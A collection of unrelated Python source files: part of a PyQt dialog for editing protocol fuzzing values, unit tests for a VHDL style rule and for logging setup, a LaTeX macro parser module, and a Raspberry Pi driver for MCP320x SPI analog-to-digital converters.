        self.update_message_data_string()
        self.fuzz_table_model.update()
        self.ui.tblFuzzingValues.resize_me()

    @pyqtSlot(int)
    def on_fuzzing_end_changed(self, value: int):
        """Move the label end to the new (1-based) position; clears fuzz values."""
        self.ui.spinBoxFuzzingStart.setMaximum(self.ui.spinBoxFuzzingEnd.value())
        new_end = self.message.convert_index(value - 1, self.proto_view, 0, False)[1] + 1
        self.current_label.end = new_end
        self.current_label.fuzz_values[:] = []
        self.update_message_data_string()
        self.fuzz_table_model.update()
        self.ui.tblFuzzingValues.resize_me()

    @pyqtSlot(int)
    def on_combo_box_fuzzing_label_current_index_changed(self, index: int):
        """Switch the table and range spin boxes to the newly selected label."""
        self.fuzz_table_model.fuzzing_label = self.current_label
        self.fuzz_table_model.update()
        self.update_message_data_string()
        self.ui.tblFuzzingValues.resize_me()

        # Update spin boxes without re-triggering the range-changed slots.
        self.ui.spinBoxFuzzingStart.blockSignals(True)
        self.ui.spinBoxFuzzingStart.setValue(self.current_label_start + 1)
        self.ui.spinBoxFuzzingStart.blockSignals(False)

        self.ui.spinBoxFuzzingEnd.blockSignals(True)
        self.ui.spinBoxFuzzingEnd.setValue(self.current_label_end)
        self.ui.spinBoxFuzzingEnd.blockSignals(False)

    @pyqtSlot()
    def on_btn_add_row_clicked(self):
        """Append an empty fuzz value row to the current label."""
        self.current_label.add_fuzz_value()
        self.fuzz_table_model.update()

    @pyqtSlot()
    def on_btn_del_row_clicked(self):
        """Delete the currently selected rows from the value table."""
        min_row, max_row, _, _ = self.ui.tblFuzzingValues.selection_range()
        self.delete_lines(min_row, max_row)

    @pyqtSlot(int, int)
    def delete_lines(self, min_row, max_row):
        """Remove fuzz values min_row..max_row; min_row == -1 drops the last value."""
        if min_row == -1:
            self.current_label.fuzz_values = self.current_label.fuzz_values[:-1]
        else:
            self.current_label.fuzz_values = self.current_label.fuzz_values[:min_row] + self.current_label.fuzz_values[
                                                                                        max_row + 1:]

        _ = self.current_label  # if user deleted all, this will restore a fuzz value

        self.fuzz_table_model.update()

    @pyqtSlot()
    def on_remove_duplicates_state_changed(self):
        """Toggle duplicate removal for the table model and current labels."""
        self.fuzz_table_model.remove_duplicates = self.ui.chkBRemoveDuplicates.isChecked()
        self.fuzz_table_model.update()
        self.remove_duplicates()

    @pyqtSlot()
    def set_add_spinboxes_maximum_on_label_change(self):
        """Recompute the maxima of all value spin boxes from the label width."""
        nbits = self.current_label.end - self.current_label.start  # Use Bit Start/End for maximum calc.
        if nbits >= 32:
            nbits = 31  # cap so 2**nbits stays within spin box integer range
        max_val = 2 ** nbits - 1
        self.ui.sBAddRangeStart.setMaximum(max_val - 1)
        self.ui.sBAddRangeEnd.setMaximum(max_val)
        self.ui.sBAddRangeEnd.setValue(max_val)
        self.ui.sBAddRangeStep.setMaximum(max_val)
        self.ui.spinBoxLowerBound.setMaximum(max_val - 1)
        self.ui.spinBoxUpperBound.setMaximum(max_val)
        self.ui.spinBoxUpperBound.setValue(max_val)
        self.ui.spinBoxBoundaryNumber.setMaximum(int(max_val / 2) + 1)
        self.ui.spinBoxRandomMinimum.setMaximum(max_val - 1)
        self.ui.spinBoxRandomMaximum.setMaximum(max_val)
        self.ui.spinBoxRandomMaximum.setValue(max_val)

    @pyqtSlot(int)
    def on_fuzzing_range_start_changed(self, value: int):
        """Keep range end >= start and bound the step size accordingly."""
        self.ui.sBAddRangeEnd.setMinimum(value)
        self.ui.sBAddRangeStep.setMaximum(self.ui.sBAddRangeEnd.value() - value)

    @pyqtSlot(int)
    def on_fuzzing_range_end_changed(self, value: int):
        """Keep range start < end and bound the step size accordingly."""
        self.ui.sBAddRangeStart.setMaximum(value - 1)
        self.ui.sBAddRangeStep.setMaximum(value - self.ui.sBAddRangeStart.value())

    @pyqtSlot()
    def on_lower_bound_checked_changed(self):
        """Enable/disable the lower-bound controls depending on the check boxes."""
        if self.ui.checkBoxLowerBound.isChecked():
            self.ui.spinBoxLowerBound.setEnabled(True)
            self.ui.spinBoxBoundaryNumber.setEnabled(True)
        elif not self.ui.checkBoxUpperBound.isChecked():
            # Neither bound active: boundary count is meaningless too.
            self.ui.spinBoxLowerBound.setEnabled(False)
            self.ui.spinBoxBoundaryNumber.setEnabled(False)
        else:
            self.ui.spinBoxLowerBound.setEnabled(False)

    @pyqtSlot()
    def on_upper_bound_checked_changed(self):
        """Enable/disable the upper-bound controls depending on the check boxes."""
        if self.ui.checkBoxUpperBound.isChecked():
            self.ui.spinBoxUpperBound.setEnabled(True)
            self.ui.spinBoxBoundaryNumber.setEnabled(True)
        elif not self.ui.checkBoxLowerBound.isChecked():
            self.ui.spinBoxUpperBound.setEnabled(False)
            self.ui.spinBoxBoundaryNumber.setEnabled(False)
        else:
            self.ui.spinBoxUpperBound.setEnabled(False)

    @pyqtSlot()
    def on_lower_bound_changed(self):
        """Keep upper bound >= lower bound and limit the boundary count."""
        self.ui.spinBoxUpperBound.setMinimum(self.ui.spinBoxLowerBound.value())
        self.ui.spinBoxBoundaryNumber.setMaximum(math.ceil((self.ui.spinBoxUpperBound.value()
                                                            - self.ui.spinBoxLowerBound.value()) / 2))

    @pyqtSlot()
    def on_upper_bound_changed(self):
        """Keep lower bound < upper bound and limit the boundary count."""
        self.ui.spinBoxLowerBound.setMaximum(self.ui.spinBoxUpperBound.value() - 1)
        self.ui.spinBoxBoundaryNumber.setMaximum(math.ceil((self.ui.spinBoxUpperBound.value()
                                                            - self.ui.spinBoxLowerBound.value()) / 2))

    @pyqtSlot()
    def on_random_range_min_changed(self):
        """Keep random maximum >= random minimum."""
        self.ui.spinBoxRandomMaximum.setMinimum(self.ui.spinBoxRandomMinimum.value())

    @pyqtSlot()
    def on_random_range_max_changed(self):
        """Keep random minimum < random maximum."""
        self.ui.spinBoxRandomMinimum.setMaximum(self.ui.spinBoxRandomMaximum.value() - 1)

    @pyqtSlot()
    def on_btn_add_fuzzing_values_clicked(self):
        """Dispatch to the strategy selected in the combo box (range/boundaries/random)."""
        if self.ui.comboBoxStrategy.currentIndex() == 0:
            self.__add_fuzzing_range()
        elif self.ui.comboBoxStrategy.currentIndex() == 1:
            self.__add_fuzzing_boundaries()
        elif self.ui.comboBoxStrategy.currentIndex() == 2:
            self.__add_random_fuzzing_values()

    def __add_fuzzing_range(self):
        """Add values start..end (inclusive) with the configured step."""
        start = self.ui.sBAddRangeStart.value()
        end = self.ui.sBAddRangeEnd.value()
        step = self.ui.sBAddRangeStep.value()
        self.fuzz_table_model.add_range(start, end + 1, step)

    def __add_fuzzing_boundaries(self):
        """Add values around the enabled lower/upper bounds (-1 = bound disabled)."""
        lower_bound = -1
        if self.ui.spinBoxLowerBound.isEnabled():
            lower_bound = self.ui.spinBoxLowerBound.value()

        upper_bound = -1
        if self.ui.spinBoxUpperBound.isEnabled():
            upper_bound = self.ui.spinBoxUpperBound.value()

        num_vals = self.ui.spinBoxBoundaryNumber.value()
        self.fuzz_table_model.add_boundaries(lower_bound, upper_bound, num_vals)

    def __add_random_fuzzing_values(self):
        """Add n random values from the configured [minimum, maximum] range."""
        n = self.ui.spinBoxNumberRandom.value()
        minimum = self.ui.spinBoxRandomMinimum.value()
        maximum = self.ui.spinBoxRandomMaximum.value()
        self.fuzz_table_model.add_random(n, minimum, maximum)

    def remove_duplicates(self):
        """Drop duplicate fuzz values of every label, keeping first occurrences in order."""
        if self.ui.chkBRemoveDuplicates.isChecked():
            for lbl in self.message.message_type:
                seq = lbl.fuzz_values[:]
                seen = set()
                add_seen = seen.add
                lbl.fuzz_values = [l for l in seq if not (l in seen or add_seen(l))]

    @pyqtSlot()
    def set_current_label_name(self):
        """Rename the current label to the combo box's edited text."""
        self.current_label.name = self.ui.comboBoxFuzzingLabel.currentText()
        self.ui.comboBoxFuzzingLabel.setItemText(self.ui.comboBoxFuzzingLabel.currentIndex(), self.current_label.name)

    @pyqtSlot(int)
    def on_fuzz_msg_changed(self, index: int):
        """Repopulate the label combo box for the newly selected message."""
        self.ui.comboBoxFuzzingLabel.setDisabled(False)

        # Keep the previous label index selected if it still exists.
        sel_label_ind = self.ui.comboBoxFuzzingLabel.currentIndex()
        self.ui.comboBoxFuzzingLabel.blockSignals(True)
        self.ui.comboBoxFuzzingLabel.clear()

        if len(self.message.message_type) == 0:
            # NOTE(review): early return leaves the combo box's signals blocked
            # (no blockSignals(False)); they are re-enabled only on the next
            # non-empty message — confirm this is intended.
            self.ui.comboBoxFuzzingLabel.setDisabled(True)
            return

        self.ui.comboBoxFuzzingLabel.addItems([lbl.name for lbl in self.message.message_type])
        self.ui.comboBoxFuzzingLabel.blockSignals(False)

        if sel_label_ind < self.ui.comboBoxFuzzingLabel.count():
            self.ui.comboBoxFuzzingLabel.setCurrentIndex(sel_label_ind)
        else:
            self.ui.comboBoxFuzzingLabel.setCurrentIndex(0)

        self.fuzz_table_model.fuzzing_label = self.current_label
        self.fuzz_table_model.update()
        self.update_message_data_string()

    @pyqtSlot()
    def on_btn_repeat_values_clicked(self):
        """Ask for a repeat count and duplicate the selected (or all) values."""
        num_repeats, ok = QInputDialog.getInt(self, self.tr("How many times shall values be repeated?"),
                                              self.tr("Number of repeats:"), 1, 1)
        if ok:
            # Repeating necessarily creates duplicates, so disable the filter.
            self.ui.chkBRemoveDuplicates.setChecked(False)
            min_row, max_row, _, _ = self.ui.tblFuzzingValues.selection_range()
            if min_row == -1:
                start, end = 0, len(self.current_label.fuzz_values)
            else:
                start, end = min_row, max_row + 1
            self.fuzz_table_model.repeat_fuzzing_values(start, end, num_repeats)


import os
import unittest

from vsg.rules import iteration_scheme
from vsg import vhdlFile
from vsg.tests import utils

# Module-level fixtures shared by all tests in this file: the parsed input
# file, the indent map, and the expected (fixed) output lines.
sTestDir = os.path.dirname(__file__)

lFile, eError = vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir, 'rule_300_test_input.vhd'))

dIndentMap = utils.read_indent_file()

# get_lines() output starts with an empty first element, hence the leading ''.
lExpected = ['']
utils.read_file(os.path.join(sTestDir, 'rule_300_test_input.fixed.vhd'), lExpected)


class test_iteration_scheme_rule(unittest.TestCase):
    """Tests for iteration_scheme rule 300 (analysis and fix)."""

    def setUp(self):
        """Create a fresh vhdlFile with the shared indent map for each test."""
        self.oFile = vhdlFile.vhdlFile(lFile)
        self.assertIsNone(eError)
        self.oFile.set_indent_map(dIndentMap)

    def test_rule_300(self):
        """The rule reports its metadata and flags the expected lines."""
        rule_under_test = iteration_scheme.rule_300()
        self.assertTrue(rule_under_test)
        self.assertEqual(rule_under_test.name, 'iteration_scheme')
        self.assertEqual(rule_under_test.identifier, '300')

        expected_violation_lines = [13, 17]

        rule_under_test.analyze(self.oFile)
        self.assertEqual(expected_violation_lines,
                         utils.extract_violation_lines_from_violation_object(rule_under_test.violations))

    def test_fix_rule_300(self):
        """Fixing produces the reference file and removes all violations."""
        rule_under_test = iteration_scheme.rule_300()

        rule_under_test.fix(self.oFile)

        self.assertEqual(lExpected, self.oFile.get_lines())

        rule_under_test.analyze(self.oFile)
        self.assertEqual(rule_under_test.violations, [])

#
# LMirror is Copyright (C) 2010 Robert Collins <robertc@robertcollins.net>
# 
# LMirror is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
# 
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.  See the GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License along with
# this program.  If not, see <http://www.gnu.org/licenses/>.
# 
# In the LMirror source tree the file COPYING.txt contains the GNU General Public
# License version 3.
# 

"""Tests for logging support code."""

from StringIO import StringIO
import logging
import os.path
import time

from l_mirror import logging_support
from l_mirror.tests import ResourcedTestCase
from l_mirror.tests.logging_resource import LoggingResourceManager
from l_mirror.tests.stubpackage import TempDirResource


class TestLoggingSetup(ResourcedTestCase):
    """Checks for logging_support.configure_logging's handler/formatter setup."""

    resources = [('logging', LoggingResourceManager())]

    def test_configure_logging_sets_converter(self):
        """configure_logging installs a console and a file handler with a UTC formatter."""
        stream = StringIO()
        console, logfile, formatter = logging_support.configure_logging(stream)
        self.assertEqual(console, logging.root.handlers[0])
        self.assertEqual(logfile, logging.root.handlers[1])
        self.assertEqual(None, console.formatter)
        self.assertEqual(formatter, logfile.formatter)
        self.assertEqual(time.gmtime, formatter.converter)
        self.assertEqual("%Y-%m-%d %H:%M:%SZ", formatter.datefmt)
        self.assertEqual(logging.StreamHandler, console.__class__)
        self.assertEqual(stream, console.stream)
        self.assertEqual(logging.FileHandler, logfile.__class__)
        self.assertEqual(os.path.expanduser("~/.cache/lmirror/log"), logfile.baseFilename)

    def test_can_supply_filename_None(self):
        """Passing filename=None suppresses the file handler entirely."""
        stream = StringIO()
        console, logfile, formatter = logging_support.configure_logging(stream, None)
        self.assertEqual(None, logfile)

# -*- coding: utf8 -*-

###########################################################################
#   This is the package latexparser
#
#   This program is free software: you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation, either version 3 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   You should have received a copy of the GNU General Public License
#   along with this program.  If not, see <http://www.gnu.org/licenses/>.
###########################################################################

# copyright (c) Laurent Claessens, 2010,2012-2016
# email: laurent@claessens-donadello.eu

import codecs
from latexparser.InputPaths import InputPaths

class Occurrence(object):
    r"""
    One occurrence of a macro in a LaTeX source file.

    self.as_written : the code as it appears in the file, including \MyMacro,
        including the backslash.
    self.position : the position at which this occurrence appears.
        Example, if we look at the LatexCode

        Hello word, \MyMacro{first}
        and then \MyMacro{second}

        the first occurrence of \MyMacro has position=12
    """
    def __init__(self, name, arguments, as_written="", position=0):
        self.arguments = arguments
        self.number_of_arguments = len(arguments)
        self.name = name
        self.as_written = as_written
        self.arguments_list = arguments
        self.position = position

    def configuration(self):
        r"""
        Return the way the arguments are separated in as_written.

        Example, if we have
        \MyMacro<space>{A}<tab>{B}
        {C},
        we return the list
        ["<space>","tab","\n"]

        The following has to be true:
        self.as_written == self.name+self.configuration()[0]+self.arguments_list[0]+etc.
        """
        separators = []
        remainder = self.as_written.split(self.name)[1]
        for arg in self.arguments_list:
            split = remainder.split("{" + arg + "}")
            separator = split[0]
            try:
                remainder = split[1]
            except IndexError:
                # Argument text not found where expected: show the offending
                # occurrence before propagating the error.
                print(self.as_written)
                raise
            separators.append(separator)
        return separators

    def change_argument(self, num, func):
        r"""
        Apply the function <func> to the <num>th argument (1-based) and
        return a *new* Occurrence; self is left unchanged.

        :raises ValueError: if the separator list and argument list lengths
            disagree (as_written is inconsistent with the arguments).
        """
        n = num - 1     # Internally, the arguments are numbered from 0.
        # Copy before mutating: the previous implementation modified
        # self.arguments_list in place, which also changed self.arguments
        # (both names alias the same list) despite promising a new object.
        arguments = list(self.arguments_list)
        configuration = self.configuration()
        if len(arguments) != len(configuration):
            raise ValueError("Error : length of the configuration list has to be the same as the number of arguments")
        arguments[n] = func(arguments[n])
        new_text = self.name
        for separator, argument in zip(configuration, arguments):
            new_text = new_text + separator + "{" + argument + "}"
        return Occurrence(self.name, arguments, new_text, self.position)

    def analyse(self):
        """Dispatch to the specialised Occurrence_<macroname> class."""
        return globals()["Occurrence_" + self.name[1:]](self)     # We have to remove the initial "\" in the name of the macro.

    def __getitem__(self, a):
        return self.arguments[a]

    def __str__(self):
        return self.as_written

class Occurrence_newlabel(object):
    r"""
    takes an occurrence of \newlabel and creates an object which contains the information.

    In the self.section_name we remove "\relax" from the string.
    """
    def __init__(self, occurrence):
        self.occurrence = occurrence
        self.arguments = occurrence.arguments
        if not self.arguments:
            # No arguments: this is most likely the \newlabel definition itself.
            self.name = "Non interesting; probably the definition"
            self.listoche = [None] * 5
            self.value = self.page = self.section_name = self.fourth = self.fifth = None
        else:
            self.name = self.arguments[0][0]
            self.listoche = [a[0] for a in SearchArguments(self.arguments[1][0], 5)[0]]
            self.value = self.listoche[0]
            self.page = self.listoche[1]
            self.section_name = self.listoche[2].replace(r"\relax", "")
            self.fourth = self.listoche[3]      # I don't know the role of the fourth argument of \newlabel
            self.fifth = self.listoche[4]       # I don't know the role of the fifth argument of \newlabel

class Occurrence_addInputPath(object):
    r"""Wrap an occurrence of \addInputPath; keeps the directory argument."""
    def __init__(self, Occurrence):
        # The single argument of \addInputPath is the directory to register.
        self.directory = Occurrence[0]

class Occurrence_cite(object):
    r"""Wrap an occurrence of \cite; keeps the citation label."""
    def __init__(self, occurrence):
        self.label = occurrence[0]

    def entry(self, codeBibtex):
        """Return the bibtex entry matching this citation's label."""
        return codeBibtex[self.label]

class Occurrence_newcommand(object):
    r"""Wrap an occurrence of \newcommand: name, arity and definition."""
    def __init__(self, occurrence):
        self.occurrence = occurrence
        # Arity defaults to 0; the optional "[n]" marker stores it in argument 1.
        self.number_of_arguments = 0
        if occurrence[1][1] == "[]":
            self.number_of_arguments = occurrence[1][0]
        self.name = occurrence[0][0]
        self.definition = occurrence[-1][0]

class Occurrence_label(object):
    r"""Wrap an occurrence of \label; keeps the label name."""
    def __init__(self, occurrence):
        self.occurrence = occurrence
        self.label = occurrence.arguments[0]
class Occurrence_ref(object):
    r"""Wrap an occurrence of \ref; keeps the referenced label name."""
    def __init__(self, occurrence):
        self.occurrence = occurrence
        self.label = occurrence.arguments[0]
class Occurrence_eqref(object):
    r"""Wrap an occurrence of \eqref; keeps the referenced label name."""
    def __init__(self, occurrence):
        self.occurrence = occurrence
        self.label = occurrence.arguments[0]

class Occurrence_input(Occurrence):
    r"""
    An occurrence of \input{...}: knows the input filename and can return
    the content of the referenced file (lazily, memoized).
    """
    def __init__(self,occurrence):
        Occurrence.__init__(self,occurrence.name,occurrence.arguments,as_written=occurrence.as_written,position=occurrence.position)
        self.occurrence = occurrence
        # First argument of \input is the filename (possibly without ".tex").
        self.filename = self.occurrence[0]
        self.input_paths=InputPaths()
        self._file_content=None        # Make file_content "lazy"
    def file_content(self,input_paths=None):
        r"""
        return the content of the file corresponding to this occurrence of
        \input.
        This is not recursive.

        - 'input_path' is the list of paths in which we can search for files.

        See the macro `\addInputPath` in the file
        https://github.com/LaurentClaessens/mazhe/blob/master/configuration.tex
        """
        import os.path

        # Memoize
        if self._file_content is not None :
            return self._file_content

        # At least, we are searching in the current directory :
        if input_paths is None :
            # NOTE(review): a bare `raise` with no active exception raises
            # RuntimeError; presumably a deliberate "find the bad caller" trap.
            raise # Just to know who should do something like that

        # Creating the filename
        filename=self.filename
        strict_filename = filename
        # No extension given: assume a ".tex" file.
        if "." not in filename:
            strict_filename=filename+".tex"
    
        # Searching for the correct file in the subdirectories
        fn=input_paths.get_file(strict_filename)
        try:
            # Without [:-1] I got an artificial empty line at the end. 
            text = "".join( codecs.open(fn,"r",encoding="utf8") )[:-1]   
        except IOError :
            print("Warning : file %s not found."%strict_filename)
            raise
        self._file_content=text
        return self._file_content

#!/usr/bin/env python
#
# MCP320x
#
# Author: Maurik Holtrop
#
# This module interfaces with the MCP300x or MCP320x family of chips. These
# are 10-bit and 12-bit ADCs respectively.  The x number indicates the number
# of multiplexed analog inputs:  2 (MCP3202), 4 (MCP3204) or 8 (MCP3208)
# Communications with this chip are over the SPI protocol.
# See: https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus
#
# The version of the code has two SPI interfaces: the builtin hardware
# SPI interface on the RPI, or a "bit-banged" GPIO version.
#
# Bit-Bang GPIO:
#   We emulate a SPI port in software using the GPIO lines.
#   This is a bit slower than the hardware interface, but it is far more
#   clear what is going on, plus the RPi has only one SPI device.
#   Connections: RPi GPIO to  MCP320x
#              CS_bar_pin = CS/SHDN
#              CLK_pin    = CLK
#              MOSI_pin   = D_in
#              MISO_pin   = D_out
#
# Hardware SPI:
#   This uses the builtin hardware on the RPi. You need to enable this with the
#   raspi-config program first. The data rate can be up to 1MHz.
#   Connections: RPi pins to MCP320x
#              CE0 or CE1 = CS/SHDN  (chip select) set CS_bar = 0 or 1
#              SCK        = CLK      set CLK_pin  = 1000000 (transfer speed)
#              MOSI       = D_in     set MOSI_pin = 0
#              MISO       = D_out    set MISO_pin = 0

# The SPI protocol simulated here is MODE=0, CPHA=0, which has a positive polarity clock,
# (the clock is 0 at rest, active at 1) and a positive phase (0 to 1 transition) for reading
# or writing the data. Thus corresponds to the specifications of the MCP320x chips.
#
# From MCP3208 datasheet:
# Outgoing data : MCU latches data to A/D converter on rising edges of SCLK
# Incoming data: Data is clocked out of A/D converter on falling edges, so should be read on rising edge.
try:
    import RPi.GPIO as GPIO
except ImportError as error:
    pass
try:
    import Adafruit_BBIO as GPIO
except ImportError as error:
    pass

try:
    import spidev
except ImportError as error:
    pass

from DevLib.MyValues import MyValues


class MCP320x:
    """Interface to the MCP300x/MCP320x family of SPI ADC chips.

    The default is the MCP3208, but it will also work with the MCP3202,
    MCP3204, MCP3002, MCP3004 and MCP3008.  Communication is either over the
    hardware SPI bus (spidev) or a software "bit-banged" SPI emulated on GPIO
    lines; see the module header for wiring details.
    """

    def __init__(self, cs_bar_pin, clk_pin=1000000, mosi_pin=0, miso_pin=0, chip='MCP3208',
                 channel_max=None, bit_length=None, single_ended=True):
        """Initialize the interface and configure the GPIO or SPI port.

        mosi_pin == 0 (default) selects hardware SPI: cs_bar_pin is the CE
        number (0 or 1) and clk_pin is the bus speed in Hz.  mosi_pin > 0
        selects bit-banged GPIO mode, in which all four pin arguments are BCM
        GPIO numbers.  chip picks (channels, bits) from a lookup table, e.g.
        2 channels for the MCP3202, 4 for the MCP3204 or 8 for the MCP3208;
        pass chip=None with explicit channel_max and bit_length for an
        unlisted part.  single_ended selects single-ended (True) or
        differential (False) conversions.
        """

        self._CLK = clk_pin
        self._MOSI = mosi_pin
        self._MISO = miso_pin
        self._CS_bar = cs_bar_pin

        # Known chips: name -> (number of channels, ADC resolution in bits).
        chip_dictionary = {
                "MCP3202": (2, 12),
                "MCP3204": (4, 12),
                "MCP3208": (8, 12),
                "MCP3002": (2, 10),
                "MCP3004": (4, 10),
                "MCP3008": (8, 10)
        }

        if chip in chip_dictionary:
            self._ChannelMax = chip_dictionary[chip][0]
            self._BitLength = chip_dictionary[chip][1]
        elif chip is None and (channel_max is not None) and (bit_length is not None):
            self._ChannelMax = channel_max
            self._BitLength = bit_length
        else:
            # BUG FIX: the original message contained a {} placeholder but
            # never called .format(), so the offending chip name was not shown.
            print("Unknown chip: {} - Please re-initialize.".format(chip))
            self._ChannelMax = 0
            self._BitLength = 0
            return

        self._SingleEnded = single_ended
        self._Vref = 3.3
        # Lazy, list-like views over all channels (see MyValues).
        self._values = MyValues(self.read_adc, self._ChannelMax)
        self._volts = MyValues(self.read_volts, self._ChannelMax)

        # This is used to speed up the SPIDEV communication. Send out MSB first.
        # control[0] - bit7-3: upper 5 bits 0, because we can only send 8 bit sequences.
        #            - bit2   : Start bit - starts conversion in ADCs
        #            - bit1   : Select single_ended=1 or differential=0
        #            - bit0   : D2 high bit of channel select.
        # control[1] - bit7   : D1 middle bit of channel select.
        #            - bit6   : D0 low bit of channel select.
        #            - bit5-0 : Don't care.
        if self._SingleEnded:
            self._control0 = [0b00000110, 0b00100000, 0]  # Pre-compute part of the control word.
        else:
            self._control0 = [0b00000100, 0b00100000, 0]  # Pre-compute part of the control word.

        if self._MOSI > 0:  # Bit-bang (GPIO) mode
            # A clock value below 32 is a BCM pin number, not a bus frequency;
            # MISO must also be a real pin in this mode.
            assert self._MISO != 0 and self._CLK < 32
            if GPIO.getmode() != 11:
                GPIO.setmode(GPIO.BCM)        # Use the BCM numbering scheme

            GPIO.setup(self._CLK, GPIO.OUT)     # Setup the ports for in and output
            GPIO.setup(self._MOSI, GPIO.OUT)
            GPIO.setup(self._MISO, GPIO.IN)
            GPIO.setup(self._CS_bar, GPIO.OUT)

            GPIO.output(self._CLK, 0)           # Set the clock low.
            GPIO.output(self._MOSI, 0)          # Set the Master Out low
            GPIO.output(self._CS_bar, 1)        # Set the CS_bar high

        else:
            self._dev = spidev.SpiDev(0, self._CS_bar)  # Start a SpiDev device
            self._dev.mode = 0                          # Set SPI mode (phase)
            self._dev.max_speed_hz = self._CLK          # Set the data rate
            self._dev.bits_per_word = 8                 # Number of bit per word. ALWAYS 8

    def __del__(self):
        """Clean up the GPIO pins before being destroyed (bit-bang mode only)."""
        if self._MOSI > 0:
            GPIO.cleanup(self._CS_bar)
            GPIO.cleanup(self._CLK)
            GPIO.cleanup(self._MOSI)
            GPIO.cleanup(self._MISO)

    def get_channel_max(self):
        """Return the number of multiplexed analog input channels."""
        return self._ChannelMax

    def get_bit_length(self):
        """Return the ADC resolution: the number of bits in one conversion."""
        return self._BitLength

    def get_value_max(self):
        """Return the maximum raw value an ADC read can produce."""
        return 2 ** self._BitLength - 1

    def send_bit(self, bit):
        """Send out a single bit and pulse the clock (bit-bang mode only; no-op otherwise)."""
        if self._MOSI == 0:
            return
        #
        # The input is read on the rising edge of the clock.
        #
        GPIO.output(self._MOSI, bit)  # Set the bit.
        GPIO.output(self._CLK, 1)     # Rising edge sends data
        GPIO.output(self._CLK, 0)     # Return clock to zero.

    def read_bit(self):
        """Read a single bit from the ADC and pulse the clock (bit-bang mode only)."""
        if self._MOSI == 0:
            return 0
        #
        # The output is going out on the falling edge of the clock,
        # and is to be read on the rising edge of the clock.

        # Clock should be already low, and data should already be set.
        GPIO.output(self._CLK, 1)     # Set the clock high. Ready to read.
        bit = GPIO.input(self._MISO)  # Read the bit.
        GPIO.output(self._CLK, 0)     # Return clock low, next bit will be set.

        return bit

    def read_adc(self, channel):
        """Read the raw ADC value after selecting ``channel`` on the multiplexer.

        Returns an n-bit integer, with n = 10 or 12 depending on the chip.
        Convert to a voltage with: volts = data * Vref / (2**n - 1).
        """
        if channel < 0 or channel >= self._ChannelMax:
            # NOTE(review): the read still proceeds with the bad channel to
            # preserve the original behavior; the result is then meaningless.
            print("Error - chip does not have channel = {}".format(channel))

        if self._MOSI == 0:
            # SPIdev code: build the control word which selects the channel
            # and single/differential mode, then do one 3-byte transfer.
            control = [self._control0[0] + ((channel & 0b100) >> 2), self._control0[1]+((channel & 0b011) << 6), 0]
            dat = self._dev.xfer(control)
            value = (dat[1] << 8)+dat[2]  # Unpack the two 8-bit words to a single integer.
            return value

        else:
            # Bit-bang code.
            # To read out this chip you need to send:
            # 1 - start bit
            # 2 - Single ended (1) or differential (0) mode
            # 3 - Channel select: 1 bit for x=2 or 3 bits for x=4,8
            # 4 - MSB first (1) or LSB first (0)
            #
            # Start of sequence sets CS_bar low, and sends sequence
            #
            GPIO.output(self._CLK, 0)                # Make sure clock starts low.
            GPIO.output(self._MOSI, 0)
            GPIO.output(self._CS_bar, 0)             # Select the chip.
            self.send_bit(1)                         # Start bit = 1
            self.send_bit(self._SingleEnded)         # Select single or differential
            if self._ChannelMax > 2:
                self.send_bit(int((channel & 0b100) > 0))  # Send high bit of channel = DS2
                self.send_bit(int((channel & 0b010) > 0))  # Send mid  bit of channel = DS1
                self.send_bit(int((channel & 0b001) > 0))  # Send low  bit of channel = DS0
            else:
                self.send_bit(channel)

            self.send_bit(0)                       # MSB First (for MCP3x02) or don't care.

            # The clock is currently low, and the dummy bit = 0 is on the
            # output of the ADC; clock it out and discard it.
            self.read_bit()

            data = 0
            for i in range(self._BitLength):
                # Note you need to shift left first, or else you shift the last bit (bit 0)
                # to the 1 position.
                data <<= 1
                bit = self.read_bit()
                data += bit

            GPIO.output(self._CS_bar, 1)  # Unselect the chip.

            return data

    def read_volts(self, channel):
        """Read ``channel`` and convert to volts, assuming that vref is set correctly."""
        return self._Vref * self.read_adc(channel) / self.get_value_max()

    def fast_read_adc0(self):
        """Read channel 0 with as little overhead as possible.

        Use with SPIDEV (hardware SPI) mode ONLY.
        Returns the raw n-bit ADC value, with n = 10 or 12 depending on the chip.
        """
        dat = self._dev.xfer(self._control0)
        value = (dat[1] << 8) + dat[2]
        return value

    @property
    def values(self):
        """ADC values presented as a list."""
        return self._values

    @property
    def volts(self):
        """ADC voltages presented as a list."""
        return self._volts

    @property
    def accuracy(self):
        """The voltage step of the least significant bit."""
        return self._Vref / float(self.get_value_max())

    @property
    def vref(self):
        """Reference voltage used by the chip. You need to set this. It defaults to 3.3V."""
        return self._Vref

    @vref.setter
    def vref(self, vr):
        self._Vref = vr


def main(argv):
    """Test code for the MCP320x driver. This assumes you are using a MCP3208.

    With no arguments: use SPIdev on CE0 and read channel 0.
    With one argument: the channel to read (still SPIdev on CE0).
    With five arguments: cs_bar_pin clk_pin mosi_pin miso_pin channel
    (bit-banged GPIO mode).
    """
    # BUG FIX: import locally so main() also works when this module is
    # imported and main() called directly (previously sys and time were only
    # imported inside the __main__ guard).
    import sys
    import time

    if len(argv) < 3:
        print("Args : ", argv)
        cs_bar = 0
        clk_pin = 1000000
        mosi_pin = 0
        miso_pin = 0
        if len(argv) < 2:
            channel = 0
        else:
            channel = int(argv[1])

    elif len(argv) < 6:
        print("Please supply: cs_bar_pin clk_pin mosi_pin miso_pin channel")
        sys.exit(1)

    else:
        cs_bar = int(argv[1])
        clk_pin = int(argv[2])
        mosi_pin = int(argv[3])
        miso_pin = int(argv[4])
        channel = int(argv[5])

    adc_chip = MCP320x(cs_bar, clk_pin, mosi_pin, miso_pin)
    try:
        # Poll the selected channel until the user hits Ctrl-C.
        while True:
            value = adc_chip.read_adc(channel)
            print("{:4d}".format(value))
            time.sleep(0.1)
    except KeyboardInterrupt:
        sys.exit(0)


if __name__ == '__main__':
    import sys
    import time
    main(sys.argv)

# __init__.py
